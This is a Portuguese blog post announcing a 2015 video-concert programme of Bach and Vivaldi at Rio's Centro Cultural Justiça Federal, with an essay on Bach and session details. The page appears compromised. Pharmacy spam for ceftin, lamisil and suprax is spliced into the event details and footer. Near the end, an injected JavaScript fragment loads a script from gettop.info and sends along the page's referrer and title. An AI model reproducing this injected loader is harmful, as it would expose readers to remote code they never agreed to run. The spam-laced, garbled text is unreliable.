LateralMúsica sinfônicaProgramaçãoRio de Janeiro

Ministério da Cultura, Klabin S.A., Centro Cultural Justiça Federal e Cia. Bachiana Brasileira apresentam: Desafios Musicais.

A cada encontro um desafio.

É com prazer que os convidamos para a segunda apresentação de 2015, no sábado dia 28 de fevereiro, com duas sessões às 14 e às 16 horas, no Cinema Cultural Justiça Federal. A produção e a direção artística são de Saulo Chermont.

Os Desafios Musicais no CCJF, fará a homenagem neste concerto em vídeo ao Maestro Ricardo Rocha, à Cia. Bachiana Brasileira e à sua equipe. Quem conhece o amigo Ricardo, conhece também as suas qualidades de grande amigo e amante da música clássica em todos gêneros, sobretudo a música de BACH. Seu esforço pessoal e material para manter viva e atuante a BACHIANA é extraordinário: somente quem está no meio musical clássico brasileiro entenderá o que estou dizendo. Mas isto, só traz alegrias para quem faz projetos de música clássica, como fazemos também nos Desafios Musicais no CCJF, com apoio do MinC, da Klabin S/A e do nosso público, que nos prestigia com a sua presença em um sábado, nos doze meses do ano. Obrigado a vocês.

Desta vez, deixamos por conta do homenageado a elaboração de um painel musical, para acompanhar as obras apresentadas por ele na 1ª sessão nos Desafios Musicais, a seguir na íntegra.


J. S. Bach, UM PAINEL MUSICAL

Apoio cultural
Apoio cultural

Pode-se sempre discutir quem foi o maior ou o melhor compositor da história da Música, mas não sobre quem foi o mais importante, Johann Sebastian Bach, sem cuja existência e obra nenhum compositor teria como escrever o que escreveu. Isto se deu porque, antes dele, a Música havia mergulhado num caótico mundo sonoro por falta de um ordenamento coerente, o que levou compositores da envergadura de um Monteverdi e Scarlatti, na Itália, entre outros, a perseguirem a criação de um sistema que estruturasse tudo o que já se conhecia sobre os fenômenos do acorde e da harmonia, cujas bases Rameau, na França, já organizava em um primeiro tratado.

Foi aí que Bach, através de um recurso por ele chamado de temperamento, surgiu no cenário, organizando tal caos num cosmo de tonalidades, maiores e menores, como as conhecemos até hoje. E, para provar que tal ordenamento era possível, escreveu sua famosa coleção “O Cravo Bem Temperado”, com 48 prelúdios e fugas, no qual cada tonalidade foi representada por um prelúdio e uma fuga: dó maior, dó menor, dó sustenido maior, dó sustenido menor, ré maior, ré menor, etc…

Este sistema, que só se tornou padrão quase 100 anos depois, principalmente pelo advento e difusão do instrumento que seria a estrela dos séculos 19 e 20, o piano, hoje é usado no mundo inteiro, em especial pela música popular.

Porém, não fosse isto suficiente, Bach, que está completando 330 anos de nascimento em 2015, aparece hoje como o compositor que mais cresce e é difundido no mundo, ganhando sociedades com o seu nome e o cultivo de sua música, de Nova York a Tóquio, do Rio de Janeiro a Stuttgart, de Londres a Melbourne e daí por diante.

Foi pensando em tudo isso que organizamos não só um pequeno painel da música de Bach, executada e difundida nos grandes centros musicais do exterior, mas em particular a que é apresentada fora destes, como no Brasil, por exemplo. Assim, faremos um pequeno passeio que vai da Paixão segundo São Mateus em sua contemporânea performance pela Filarmônica de Berlim, aos maravilhosos Motetos, montados e gravados aqui ao sul do equador, no Rio de Janeiro, pela Cia. Bachiana Brasileira, entre outras obras executadas, na maior parte das vezes, sem os recursos humanos e materiais  suficientes para a sua realização, o que vai da contratação de músicos aos sistemas de gravação com alta definição de imagens e sua edição.
Mas é assim que a música de Bach, presente em nossa época até nos ring-tones de celulares, vai nos envolvendo e tornando-nos melhores a cada dia que passa. Venha então ouvi-la nos Desafios Musicais do próximo sábado, dia 28 de fevereiro, às 14h.!
Ricardo Rocha.

 

Na 1ª sessão, das 14 às 16 horas, a programação musical completa contendo cinco obras ícones de J. S. Bach (1685-1750), será distribuída no dia, na entrada do cinema no CCJF. Os títulos são os seguintes:
1) Trecho de 22 minutos da Paixão Segundo São João BWV 245.
2) Moteto I, BWV 225 – “Cantemos ao Senhor”, com dois coros.
3) Trecho de 27 minutos do Oratório de Natal BWV 248, com a Cantata 1.
4) Concerto para violino e oboé em ré menor BWV 1060
5) Moteto III, BWV 227 – “Jesus, minha alegria”, a cinco vozes.

 

Na 2ª. Sessão, das 16 às 18 horas, musicalmente no mesmo nível, com a apresentação e palestra do também amigo, profundo conhecedor da música erudita, crítico musical da palavra fácil e professor universitário Rodolfo Valverde, assistiremos aos concertos para violino e orquestra do compositor veneziano Antonio Vivaldi (1678-1741) que constituem uma das obras mais célebres e emblemáticas da música barroca, Le Quattro Stagioni (“As Quatro Estações”). Publicados em 1725, os quatro concertos se diferenciam dos demais compostos por il prete rosso (“o padre ruivo”) por apresentarem uma indicação programática clara: sonetos que descrevem cada uma das estações do ano. Usando as formas e estruturas que ele próprio ajudou a consolidar, Vivaldi evoca musicalmente, em cada um dos concertos, as imagens e características associadas às diversas estações da natureza através de efeitos surpreendentes. A riqueza musical e o virtuosismo das Quatro Estações poderão ser conferidos através da interpretação da violinista alemã Julia Fischer e da Academy of St. Martin in the Fields, notável orquestra de câmara inglesa, em gravações realizadas no Jardim Botânico Nacional de Gales em julho de 2001.

 

SERVIÇO

 

Cinema Cultural Justiça Federal ceftin std treatment

buy lamisil tablets uk Dia 28 de fevereiro de 2015, sábado, às 14 e às 16h.

Ingressos R$ 10,00 e R$ 5,00 (meia) para cada sessão.

Livre para todas as idades.

Programação musical sujeita a alterações sem aviso prévio.

 

 

 

http://bosconsult.org/?p=17193
 

Paixão segundo São João BWV 245 (1a. parte)
Karl Richter

[youtube]https://www.youtube.com/watch?v=LpcWCdkE1t4[/youtube]

 

Trecho de As quatro estações – Vivaldi – Primavera – Mov. Allegro
Julia Fischer ao violino

 

Purchase

Buy

suprax 400mg where to get it
Purchase

Pills Apoio Institucional Patrocínio Realização
incentivo %C3%A0 cultura Ministério da Cultura, Klabin S.A. e o Centro Cultural Justiça Federal apresentam: Desafios Musicais. CCJF cor 100 Ministério da Cultura, Klabin S.A. e o Centro Cultural Justiça Federal apresentam: Desafios Musicais. klabin 150 Ministério da Cultura, Klabin S.A. e o Centro Cultural Justiça Federal apresentam: Desafios Musicais. Brasil... Ministério da Cultura, Klabin S.A. e o Centro Cultural Justiça Federal apresentam: Desafios Musicais.

 

Aos internautas sugerimos fazerem uma viagem pelo sítio www.movimento.com e abrirem a janela dos Desafios Musicais, para apreciarem outras informações do nosso programa do mês e dos meses anteriores nos arquivos do poste.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.